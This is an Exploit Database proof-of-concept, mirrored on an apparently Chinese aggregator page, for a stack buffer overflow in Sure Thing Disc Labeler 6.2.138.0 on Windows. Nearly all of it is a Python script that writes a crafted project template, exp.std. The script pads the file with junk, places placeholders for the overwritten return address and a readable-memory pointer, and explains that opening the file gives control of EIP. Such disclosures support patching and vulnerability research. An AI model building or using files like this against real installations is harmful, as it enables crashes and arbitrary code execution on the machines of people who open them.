Sure Thing Disc Labeler 6.2.138.0 – Buffer Overflow (PoC)

• Exploit Database
• 14 阅读

• 作者： Chance Johnson
  日期： 2017-05-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42040/

• # Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC)
  # Date: 5-19-17
  # Exploit Author: Chance Johnson(albatross@loftwing.net)
  # Vendor Homepage: http://www.surething.com/
  # Software Link: http://www.surething.com/disclabeler
  # Version: 6.2.138.0
  # Tested on: Windows 7 x64 / Windows 10
  #
  # Usage: 
  #Open the project template generated by this script.
  #If a readable address is placed in AVread, no exception will be thrown
  #and a return pointer will be overwritten giving control over EIP when
  #the function returns.
  
  header= '\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00'
  header += '\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62'
  header += '\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35'
  header += '\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41'
  header += '\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63'
  
  junk1= 'D'*10968
  EIP= 'A'*4# Direct RET overwrite
  junk2= 'D'*24
  AVread = 'B'*4			# address of any readable memory
  junk3= 'D'*105693
  
  buf = header + junk1 + EIP + junk2 + AVread + junk3
  
  print "[+] Creating file with %d bytes..." % len(buf)
  
  f=open("exp.std",'wb')
  f.write(buf)
  f.close()